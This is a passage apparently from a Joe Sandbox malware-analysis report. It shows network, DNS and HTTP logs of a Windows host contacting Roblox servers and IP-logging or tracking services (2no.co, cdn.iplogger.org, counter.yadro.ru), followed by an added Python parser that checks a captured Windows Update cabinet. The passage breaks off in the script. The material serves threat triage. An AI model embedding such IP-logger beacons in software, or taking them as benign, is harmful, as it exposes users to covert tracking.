Jul 30, 2024 00:55:12.625907898 CEST | 443 | 60763 | 18.239.18.85 | 192.168.2.9
Jul 30, 2024 00:55:13.342489004 CEST | 443 | 60763 | 18.239.18.85 | 192.168.2.9
Jul 30, 2024 00:55:13.344069958 CEST | 60763 | 443 | 192.168.2.9 | 18.239.18.85
Jul 30, 2024 00:55:13.344082117 CEST | 443 | 60763 | 18.239.18.85 | 192.168.2.9
Jul 30, 2024 00:55:13.345139027 CEST | 443 | 60763 | 18.239.18.85 | 192.168.2.9
Jul 30, 2024 00:55:13.345249891 CEST | 60763 | 443 | 192.168.2.9 | 18.239.18.85
Jul 30, 2024 00:55:13.347191095 CEST | 60763 | 443 | 192.168.2.9 | 18.239.18.85
Jul 30, 2024 00:55:13.347398043 CEST | 443 | 60763 | 18.239.18.85 | 192.168.2.9
Jul 30, 2024 00:55:13.347524881 CEST | 60763 | 443 | 192.168.2.9 | 18.239.18.85
Jul 30, 2024 00:55:13.352962971 CEST | 60763 | 443 | 192.168.2.9 | 18.239.18.85
Jul 30, 2024 00:55:17.261645079 CEST | 49705 | 80 | 192.168.2.9 | 93.184.221.240
Jul 30, 2024 00:55:17.278584957 CEST | 80 | 49705 | 93.184.221.240 | 192.168.2.9
Jul 30, 2024 00:55:17.278670073 CEST | 49705 | 80 | 192.168.2.9 | 93.184.221.240
Jul 30, 2024 00:55:18.865511894 CEST | 60764 | 443 | 192.168.2.9 | 20.12.23.50
Jul 30, 2024 00:55:18.865552902 CEST | 443 | 60764 | 20.12.23.50 | 192.168.2.9
Jul 30, 2024 00:55:18.865622997 CEST | 60764 | 443 | 192.168.2.9 | 20.12.23.50
Jul 30, 2024 00:55:18.867269039 CEST | 60764 | 443 | 192.168.2.9 | 20.12.23.50
Jul 30, 2024 00:55:18.867285967 CEST | 443 | 60764 | 20.12.23.50 | 192.168.2.9
Jul 30, 2024 00:55:19.500706911 CEST | 443 | 60764 | 20.12.23.50 | 192.168.2.9
Jul 30, 2024 00:55:19.500873089 CEST | 60764 | 443 | 192.168.2.9 | 20.12.23.50
Jul 30, 2024 00:55:19.502552986 CEST | 60764 | 443 | 192.168.2.9 | 20.12.23.50
Jul 30, 2024 00:55:19.502571106 CEST | 443 | 60764 | 20.12.23.50 | 192.168.2.9
Jul 30, 2024 00:55:19.502819061 CEST | 443 | 60764 | 20.12.23.50 | 192.168.2.9
Jul 30, 2024 00:55:19.504067898 CEST | 60764 | 443 | 192.168.2.9 | 20.12.23.50
Jul 30, 2024 00:55:19.544496059 CEST | 443 | 60764 | 20.12.23.50 | 192.168.2.9
Jul 30, 2024 00:55:19.725176096 CEST | 443 | 60764 | 20.12.23.50 | 192.168.2.9
Jul 30, 2024 00:55:19.725217104 CEST | 443 | 60764 | 20.12.23.50 | 192.168.2.9
Jul 30, 2024 00:55:19.725233078 CEST | 443 | 60764 | 20.12.23.50 | 192.168.2.9
Jul 30, 2024 00:55:19.725398064 CEST | 60764 | 443 | 192.168.2.9 | 20.12.23.50
Jul 30, 2024 00:55:19.725421906 CEST | 443 | 60764 | 20.12.23.50 | 192.168.2.9
Jul 30, 2024 00:55:19.725982904 CEST | 60764 | 443 | 192.168.2.9 | 20.12.23.50
Jul 30, 2024 00:55:19.728950977 CEST | 443 | 60764 | 20.12.23.50 | 192.168.2.9
Jul 30, 2024 00:55:19.729002953 CEST | 443 | 60764 | 20.12.23.50 | 192.168.2.9
Jul 30, 2024 00:55:19.729038954 CEST | 60764 | 443 | 192.168.2.9 | 20.12.23.50
Jul 30, 2024 00:55:19.729067087 CEST | 443 | 60764 | 20.12.23.50 | 192.168.2.9
Jul 30, 2024 00:55:19.729135990 CEST | 443 | 60764 | 20.12.23.50 | 192.168.2.9
Jul 30, 2024 00:55:19.729172945 CEST | 60764 | 443 | 192.168.2.9 | 20.12.23.50
Jul 30, 2024 00:55:19.729172945 CEST | 60764 | 443 | 192.168.2.9 | 20.12.23.50
Jul 30, 2024 00:55:19.729252100 CEST | 60764 | 443 | 192.168.2.9 | 20.12.23.50
Jul 30, 2024 00:55:19.729271889 CEST | 443 | 60764 | 20.12.23.50 | 192.168.2.9
Jul 30, 2024 00:55:19.729476929 CEST | 60764 | 443 | 192.168.2.9 | 20.12.23.50
Jul 30, 2024 00:55:19.729484081 CEST | 443 | 60764 | 20.12.23.50 | 192.168.2.9
Jul 30, 2024 00:55:46.141397953 CEST | 60766 | 443 | 192.168.2.9 | 142.250.186.132
Jul 30, 2024 00:55:46.141447067 CEST | 443 | 60766 | 142.250.186.132 | 192.168.2.9
Jul 30, 2024 00:55:46.141582012 CEST | 60766 | 443 | 192.168.2.9 | 142.250.186.132
Jul 30, 2024 00:55:46.141840935 CEST | 60766 | 443 | 192.168.2.9 | 142.250.186.132
Jul 30, 2024 00:55:46.141860008 CEST | 443 | 60766 | 142.250.186.132 | 192.168.2.9
Jul 30, 2024 00:55:46.794542074 CEST | 443 | 60766 | 142.250.186.132 | 192.168.2.9
Jul 30, 2024 00:55:46.794898033 CEST | 60766 | 443 | 192.168.2.9 | 142.250.186.132
Jul 30, 2024 00:55:46.794913054 CEST | 443 | 60766 | 142.250.186.132 | 192.168.2.9
Jul 30, 2024 00:55:46.795252085 CEST | 443 | 60766 | 142.250.186.132 | 192.168.2.9
Jul 30, 2024 00:55:46.795551062 CEST | 60766 | 443 | 192.168.2.9 | 142.250.186.132
Jul 30, 2024 00:55:46.795610905 CEST | 443 | 60766 | 142.250.186.132 | 192.168.2.9
Jul 30, 2024 00:55:46.848611116 CEST | 60766 | 443 | 192.168.2.9 | 142.250.186.132
Jul 30, 2024 00:55:56.718868017 CEST | 443 | 60766 | 142.250.186.132 | 192.168.2.9
Jul 30, 2024 00:55:56.718938112 CEST | 443 | 60766 | 142.250.186.132 | 192.168.2.9
Jul 30, 2024 00:55:56.719006062 CEST | 60766 | 443 | 192.168.2.9 | 142.250.186.132
Jul 30, 2024 00:55:58.527420998 CEST | 60766 | 443 | 192.168.2.9 | 142.250.186.132
Jul 30, 2024 00:55:58.527443886 CEST | 443 | 60766 | 142.250.186.132 | 192.168.2.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 30, 2024 00:54:26.235090017 CEST | 58585 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:54:26.253603935 CEST | 53 | 58585 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:27.625972986 CEST | 51912 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:54:27.643976927 CEST | 53 | 51912 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:41.594574928 CEST | 54827 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:54:41.594809055 CEST | 62378 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:54:41.639410019 CEST | 53 | 54304 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:41.639461040 CEST | 53 | 56357 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:41.640405893 CEST | 53 | 62378 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:41.641416073 CEST | 53 | 54827 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:44.035868883 CEST | 53 | 58576 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:44.261034012 CEST | 59151 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:54:44.261274099 CEST | 55596 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:54:44.261785984 CEST | 54726 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:54:44.262027025 CEST | 52410 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:54:44.279443026 CEST | 53 | 54726 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:44.279458046 CEST | 53 | 52410 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:44.280565977 CEST | 53 | 59151 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:44.296135902 CEST | 53 | 55596 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:45.014117002 CEST | 64343 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:54:45.014271975 CEST | 65310 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:54:45.032552004 CEST | 53 | 64343 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:45.032634974 CEST | 53 | 65310 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:46.078525066 CEST | 64804 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:54:46.078872919 CEST | 52991 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:54:46.098335028 CEST | 53 | 64804 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:46.098349094 CEST | 53 | 52991 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:46.985287905 CEST | 49338 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:54:46.985446930 CEST | 59654 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:54:47.004208088 CEST | 53 | 49338 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:47.005100012 CEST | 53 | 59654 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:47.514206886 CEST | 55470 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:54:47.514409065 CEST | 63759 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:54:47.535337925 CEST | 53 | 63759 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:47.535978079 CEST | 53 | 55470 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:51.100529909 CEST | 53 | 54231 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:55:17.857888937 CEST | 138 | 138 | 192.168.2.9 | 192.168.2.255
Jul 30, 2024 00:55:41.453160048 CEST | 53 | 57882 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:56:05.726604939 CEST | 51489 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:57:06.605817080 CEST | 63318 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:57:06.624155045 CEST | 53 | 63318 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jul 30, 2024 00:54:43.642514944 CEST | 192.168.2.9 | 1.1.1.1 | c255 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 30, 2024 00:54:26.235090017 CEST | 192.168.2.9 | 1.1.1.1 | 0xd56e | Standard query (0) | ecsv2.roblox.com | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:27.625972986 CEST | 192.168.2.9 | 1.1.1.1 | 0xdf0 | Standard query (0) | clientsettingscdn.roblox.com | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:41.594574928 CEST | 192.168.2.9 | 1.1.1.1 | 0xd092 | Standard query (0) | 2no.co | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:41.594809055 CEST | 192.168.2.9 | 1.1.1.1 | 0xf183 | Standard query (0) | 2no.co | 65 | IN (0x0001) | false
Jul 30, 2024 00:54:44.261034012 CEST | 192.168.2.9 | 1.1.1.1 | 0x2ba7 | Standard query (0) | cdn.iplogger.org | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:44.261274099 CEST | 192.168.2.9 | 1.1.1.1 | 0x7d38 | Standard query (0) | cdn.iplogger.org | 65 | IN (0x0001) | false
Jul 30, 2024 00:54:44.261785984 CEST | 192.168.2.9 | 1.1.1.1 | 0x6c33 | Standard query (0) | counter.yadro.ru | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:44.262027025 CEST | 192.168.2.9 | 1.1.1.1 | 0x3cd | Standard query (0) | counter.yadro.ru | 65 | IN (0x0001) | false
Jul 30, 2024 00:54:45.014117002 CEST | 192.168.2.9 | 1.1.1.1 | 0x73ae | Standard query (0) | a.nel.cloudflare.com | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:45.014271975 CEST | 192.168.2.9 | 1.1.1.1 | 0xdb1b | Standard query (0) | a.nel.cloudflare.com | 65 | IN (0x0001) | false
Jul 30, 2024 00:54:46.078525066 CEST | 192.168.2.9 | 1.1.1.1 | 0xac44 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:46.078872919 CEST | 192.168.2.9 | 1.1.1.1 | 0x570d | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Jul 30, 2024 00:54:46.985287905 CEST | 192.168.2.9 | 1.1.1.1 | 0x70e3 | Standard query (0) | counter.yadro.ru | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:46.985446930 CEST | 192.168.2.9 | 1.1.1.1 | 0x5c36 | Standard query (0) | counter.yadro.ru | 65 | IN (0x0001) | false
Jul 30, 2024 00:54:47.514206886 CEST | 192.168.2.9 | 1.1.1.1 | 0x1494 | Standard query (0) | cdn.iplogger.org | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:47.514409065 CEST | 192.168.2.9 | 1.1.1.1 | 0x7bcc | Standard query (0) | cdn.iplogger.org | 65 | IN (0x0001) | false
Jul 30, 2024 00:56:05.726604939 CEST | 192.168.2.9 | 1.1.1.1 | 0x705b | Standard query (0) | clientsettingscdn.roblox.com | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:57:06.605817080 CEST | 192.168.2.9 | 1.1.1.1 | 0xdb2c | Standard query (0) | clientsettingscdn.roblox.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 30, 2024 00:54:26.253603935 CEST | 1.1.1.1 | 192.168.2.9 | 0xd56e | No error (0) | ecsv2.roblox.com | titanium.roblox.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:54:26.253603935 CEST | 1.1.1.1 | 192.168.2.9 | 0xd56e | No error (0) | titanium.roblox.com | edge-term4.roblox.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:54:26.253603935 CEST | 1.1.1.1 | 192.168.2.9 | 0xd56e | No error (0) | edge-term4.roblox.com | edge-term4-ams2.roblox.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:54:26.253603935 CEST | 1.1.1.1 | 192.168.2.9 | 0xd56e | No error (0) | edge-term4-ams2.roblox.com | | 128.116.21.3 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:27.643976927 CEST | 1.1.1.1 | 192.168.2.9 | 0xdf0 | No error (0) | clientsettingscdn.roblox.com | d2v57ias1m20gl.cloudfront.net | | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:54:27.643976927 CEST | 1.1.1.1 | 192.168.2.9 | 0xdf0 | No error (0) | d2v57ias1m20gl.cloudfront.net | | 18.239.18.85 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:27.643976927 CEST | 1.1.1.1 | 192.168.2.9 | 0xdf0 | No error (0) | d2v57ias1m20gl.cloudfront.net | | 18.239.18.127 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:27.643976927 CEST | 1.1.1.1 | 192.168.2.9 | 0xdf0 | No error (0) | d2v57ias1m20gl.cloudfront.net | | 18.239.18.114 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:27.643976927 CEST | 1.1.1.1 | 192.168.2.9 | 0xdf0 | No error (0) | d2v57ias1m20gl.cloudfront.net | | 18.239.18.53 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:41.640405893 CEST | 1.1.1.1 | 192.168.2.9 | 0xf183 | No error (0) | 2no.co | | | 65 | IN (0x0001) | false
Jul 30, 2024 00:54:41.641416073 CEST | 1.1.1.1 | 192.168.2.9 | 0xd092 | No error (0) | 2no.co | | 104.21.79.229 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:41.641416073 CEST | 1.1.1.1 | 192.168.2.9 | 0xd092 | No error (0) | 2no.co | | 172.67.149.76 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:44.279443026 CEST | 1.1.1.1 | 192.168.2.9 | 0x6c33 | No error (0) | counter.yadro.ru | | 88.212.201.198 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:44.279443026 CEST | 1.1.1.1 | 192.168.2.9 | 0x6c33 | No error (0) | counter.yadro.ru | | 88.212.202.52 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:44.279443026 CEST | 1.1.1.1 | 192.168.2.9 | 0x6c33 | No error (0) | counter.yadro.ru | | 88.212.201.204 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:44.280565977 CEST | 1.1.1.1 | 192.168.2.9 | 0x2ba7 | No error (0) | cdn.iplogger.org | | 104.21.4.208 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:44.280565977 CEST | 1.1.1.1 | 192.168.2.9 | 0x2ba7 | No error (0) | cdn.iplogger.org | | 172.67.132.113 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:44.296135902 CEST | 1.1.1.1 | 192.168.2.9 | 0x7d38 | No error (0) | cdn.iplogger.org | | | 65 | IN (0x0001) | false
Jul 30, 2024 00:54:45.032552004 CEST | 1.1.1.1 | 192.168.2.9 | 0x73ae | No error (0) | a.nel.cloudflare.com | | 35.190.80.1 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:46.098335028 CEST | 1.1.1.1 | 192.168.2.9 | 0xac44 | No error (0) | www.google.com | | 142.250.186.132 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:46.098349094 CEST | 1.1.1.1 | 192.168.2.9 | 0x570d | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Jul 30, 2024 00:54:47.004208088 CEST | 1.1.1.1 | 192.168.2.9 | 0x70e3 | No error (0) | counter.yadro.ru | | 88.212.201.198 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:47.004208088 CEST | 1.1.1.1 | 192.168.2.9 | 0x70e3 | No error (0) | counter.yadro.ru | | 88.212.201.204 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:47.004208088 CEST | 1.1.1.1 | 192.168.2.9 | 0x70e3 | No error (0) | counter.yadro.ru | | 88.212.202.52 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:47.535337925 CEST | 1.1.1.1 | 192.168.2.9 | 0x7bcc | No error (0) | cdn.iplogger.org | | | 65 | IN (0x0001) | false
Jul 30, 2024 00:54:47.535978079 CEST | 1.1.1.1 | 192.168.2.9 | 0x1494 | No error (0) | cdn.iplogger.org | | 104.21.4.208 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:54:47.535978079 CEST | 1.1.1.1 | 192.168.2.9 | 0x1494 | No error (0) | cdn.iplogger.org | | 172.67.132.113 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:56:05.749526024 CEST | 1.1.1.1 | 192.168.2.9 | 0x705b | No error (0) | clientsettingscdn.roblox.com | clientsettingscdn.roblox.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:57:06.624155045 CEST | 1.1.1.1 | 192.168.2.9 | 0xdb2c | No error (0) | clientsettingscdn.roblox.com | d2v57ias1m20gl.cloudfront.net | | CNAME (Canonical name) | IN (0x0001) | false
                                                                                Jul 30, 2024 00:57:06.624155045 CEST1.1.1.1192.168.2.90xdb2cNo error (0)d2v57ias1m20gl.cloudfront.net99.86.4.125A (IP address)IN (0x0001)false
                                                                                Jul 30, 2024 00:57:06.624155045 CEST1.1.1.1192.168.2.90xdb2cNo error (0)d2v57ias1m20gl.cloudfront.net99.86.4.62A (IP address)IN (0x0001)false
                                                                                Jul 30, 2024 00:57:06.624155045 CEST1.1.1.1192.168.2.90xdb2cNo error (0)d2v57ias1m20gl.cloudfront.net99.86.4.8A (IP address)IN (0x0001)false
                                                                                Jul 30, 2024 00:57:06.624155045 CEST1.1.1.1192.168.2.90xdb2cNo error (0)d2v57ias1m20gl.cloudfront.net99.86.4.20A (IP address)IN (0x0001)false
• slscr.update.microsoft.com
• 2no.co
• https:
  • cdn.iplogger.org
  • counter.yadro.ru
• a.nel.cloudflare.com
• fs.microsoft.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49712 | 20.114.59.183 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:54:42 UTC | 306 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=USNpFfLxfLR8zud&MD=tboVBsUh HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Host: slscr.update.microsoft.com
2024-07-29 22:54:42 UTC | 560 | IN | HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/octet-stream
Expires: -1
Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
MS-CorrelationId: e7619580-9035-432a-b380-dcb63dacc9d9
MS-RequestId: 0823a2d8-dd85-4dcf-bf4f-e692107b6e92
MS-CV: zKpYDFaXZESAWb+d.0
X-Microsoft-SLSClientCache: 2880
Content-Disposition: attachment; filename=environment.cab
X-Content-Type-Options: nosniff
Date: Mon, 29 Jul 2024 22:54:41 GMT
Connection: close
Content-Length: 24490
2024-07-29 22:54:42 UTC | 15824 | IN | Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-07-29 22:54:42 UTC | 8666 | IN | Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1
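Session 0 has no PID or process attached, carries the Windows-Update-Agent User-Agent, and its response body starts with the MSCF signature of a cabinet file. Before dismissing it as update-service background noise, a reviewer wants the captured bytes to actually parse as one. The following is an added example for this report, not code from Joe Sandbox or Microsoft: it walks the CFHEADER, CFFOLDER, CFFILE and first CFDATA structures of the public MS-CAB format using the first 116 bytes of the Data Raw dump copied from the page, and checks them against the response's Content-Length. Reading the 20-byte header reserve as a signed-cabinet marker followed by the offset and length of an appended Authenticode signature is an assumption in this example; the arithmetic is what backs it up. The cabinet proper ends at byte 7826 and the reserve points at a 16664-byte trailer starting there, which together give exactly the 24490-byte Content-Length, so the second captured fragment (which begins at byte 15824 and is DER-encoded data) falls inside that signature trailer.

```python
"""Parse the cabinet captured in session 0 (environment.cab from the SLS endpoint).

Added example for this report; it is not Joe Sandbox or Microsoft code.
ENVIRONMENT_CAB_PREFIX is the first 116 bytes of the response's "Data Raw"
dump, copied from the page; CONTENT_LENGTH is the response's Content-Length.
Structure layout follows the public MS-CAB format (CFHEADER/CFFOLDER/CFFILE/CFDATA).
"""
import struct

ENVIRONMENT_CAB_PREFIX = bytes.fromhex("""
    4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00
    44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00
    23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00
    18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00
    01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00
    00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e
    63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c
    07 54 13 db
""")
CONTENT_LENGTH = 24490

FLAG_PREV_CABINET, FLAG_NEXT_CABINET, FLAG_RESERVE_PRESENT = 1, 2, 4
COMPRESSION = {0: "NONE", 1: "MSZIP", 2: "QUANTUM", 3: "LZX"}


def _cstr(buf, pos):
    """Read a NUL-terminated string starting at pos; return (bytes, next_pos)."""
    end = buf.index(b"\x00", pos)
    return buf[pos:end], end + 1


def parse_cab_header(buf):
    """Parse CFHEADER, the CFFOLDER list and the CFFILE list from a cabinet prefix."""
    if buf[:4] != b"MSCF":
        raise ValueError("not a cabinet file, signature is %r" % buf[:4])
    (cb_cabinet, coff_files, ver_minor, ver_major, c_folders, c_files,
     flags, set_id, i_cabinet) = struct.unpack_from("<4xI4xI4xBBHHHHH", buf, 4)
    pos = 36
    reserve, cb_folder_res, cb_data_res = b"", 0, 0
    if flags & FLAG_RESERVE_PRESENT:
        cb_header_res, cb_folder_res, cb_data_res = struct.unpack_from("<HBB", buf, pos)
        pos += 4
        reserve, pos = buf[pos:pos + cb_header_res], pos + cb_header_res
    for bit in (FLAG_PREV_CABINET, FLAG_NEXT_CABINET):
        if flags & bit:  # szCabinetPrev/szDiskPrev or szCabinetNext/szDiskNext
            _, pos = _cstr(buf, pos)
            _, pos = _cstr(buf, pos)
    folders = []
    for _ in range(c_folders):
        coff_cab_start, c_cfdata, type_compress = struct.unpack_from("<IHH", buf, pos)
        pos += 8 + cb_folder_res
        folders.append({"coff_cab_start": coff_cab_start, "c_cfdata": c_cfdata,
                        "compression": COMPRESSION.get(type_compress & 0x0F, "UNKNOWN")})
    files, pos = [], coff_files
    for _ in range(c_files):
        cb_file, uoff, i_folder, _date, _time, attribs = struct.unpack_from("<IIHHHH", buf, pos)
        name, pos = _cstr(buf, pos + 16)
        files.append({"name": name.decode("utf-8" if attribs & 0x80 else "cp1252"),
                      "size": cb_file, "folder_offset": uoff, "folder": i_folder})
    # Assumption (cross-checked in triage()): a signed cabinet keeps a 20-byte
    # header reserve holding a 00 00 10 00 marker, then the offset and length
    # of the Authenticode signature appended after the cabinet proper.
    signature = None
    if len(reserve) >= 12 and reserve[:4] == b"\x00\x00\x10\x00":
        signature = struct.unpack_from("<II", reserve, 4)
    return {"cb_cabinet": cb_cabinet, "coff_files": coff_files,
            "version": (ver_major, ver_minor), "flags": flags, "set_id": set_id,
            "cabinet_index": i_cabinet, "cb_data_reserve": cb_data_res,
            "folders": folders, "files": files, "signature": signature}


def parse_first_block(buf, header):
    """Parse the first CFDATA block of folder 0 and look for the MSZIP 'CK' marker."""
    pos = header["folders"][0]["coff_cab_start"]
    csum, cb_data, cb_uncomp = struct.unpack_from("<IHH", buf, pos)
    payload = pos + 8 + header["cb_data_reserve"]
    return {"csum": csum, "cb_data": cb_data, "cb_uncomp": cb_uncomp,
            "mszip_marker": buf[payload:payload + 2] == b"CK",
            "end": payload + cb_data}


def triage(buf, content_length):
    """The consistency checks worth doing before filing this download as update noise."""
    hdr = parse_cab_header(buf)
    blk = parse_first_block(buf, hdr)
    sig_off, sig_len = hdr["signature"] or (0, 0)
    return {
        "file": hdr["files"][0]["name"],
        "one_block_cabinet": hdr["folders"][0]["c_cfdata"] == 1 and blk["end"] == hdr["cb_cabinet"],
        "uncompressed_matches_file": blk["cb_uncomp"] == hdr["files"][0]["size"],
        "signature_follows_cabinet": sig_off == hdr["cb_cabinet"],
        "signature_fills_response": sig_off + sig_len == content_length,
    }


if __name__ == "__main__":
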